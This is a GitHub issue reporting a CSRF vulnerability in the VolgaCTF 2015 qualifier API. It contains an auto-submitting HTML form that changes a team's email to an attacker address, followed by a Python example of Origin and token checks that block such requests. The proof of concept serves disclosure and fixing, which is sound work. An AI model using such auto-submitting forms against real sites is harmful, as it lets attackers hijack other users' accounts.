VolgaCTF/volgactf-qualifier-backend

API CSRF

Closed this issue · 1 comment

api.2015.volgactf.ru is vulnerable to CSRF attacks.

Example of changing a team's email:

<form id="csrf" action="http://api.2015.volgactf.ru/team/change-email" method="POST">
  <input type="hidden" name="email" value="test@attacker.com" />
  <input type="submit" value="Submit request" />
</form>
<script>document.getElementById("csrf").submit()</script>
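
As an added example (not the project's own code), one way the backend could guard state-changing endpoints such as /team/change-email: reject requests whose Origin/Referer is not the API's own origin, and require a per-session token that a page on another site cannot read. API_ORIGIN, SERVER_SECRET, the header names and the session ids are assumptions made up for the example.

```python
# Added example, not VolgaCTF code: a CSRF guard for form/JSON API endpoints.
# Two independent checks: (1) the browser-set Origin (or Referer) header must
# match the API's own origin; (2) the request must carry a token derived from
# the caller's session, which a cross-site form like the one above cannot supply.
import hmac
import hashlib
from urllib.parse import urlsplit

API_ORIGIN = "http://api.2015.volgactf.ru"   # assumed origin of the API
SERVER_SECRET = b"constructed-demo-secret"    # constructed; load from config in practice


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session: HMAC(secret, session id). The app embeds it in the
    page (hidden field or header) so only same-origin scripts/forms can present it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _origin_of(url: str) -> str:
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}"


def csrf_check(method: str, headers: dict, session_id: str, form: dict):
    """Return (allowed, reason). headers/form are plain dicts of the request."""
    if method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"            # must not change state anyway
    # Browsers set Origin on cross-site POSTs; fall back to Referer if absent.
    origin = headers.get("Origin")
    if origin is None and headers.get("Referer"):
        origin = _origin_of(headers["Referer"])
    if origin is None:
        return False, "missing Origin/Referer"
    if origin != API_ORIGIN:
        return False, f"cross-origin request from {origin}"
    token = headers.get("X-CSRF-Token") or form.get("csrf_token")
    if not token:
        return False, "missing CSRF token"
    if not hmac.compare_digest(token, issue_csrf_token(session_id)):
        return False, "CSRF token does not match session"
    return True, "ok"


if __name__ == "__main__":
    # Constructed requests: the auto-submitted form from the report, then a legitimate one.
    sid = "team-42-session"
    print(csrf_check("POST", {"Origin": "http://attacker.com"}, sid, {"email": "test@attacker.com"}))
    print(csrf_check("POST", {"Origin": API_ORIGIN}, sid,
                     {"email": "team@example.org", "csrf_token": issue_csrf_token(sid)}))
```

The Origin check alone stops the form above; the token check additionally covers clients that strip or omit Origin and Referer.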

Thanks for pointing out the problem! I will try to fix it soon.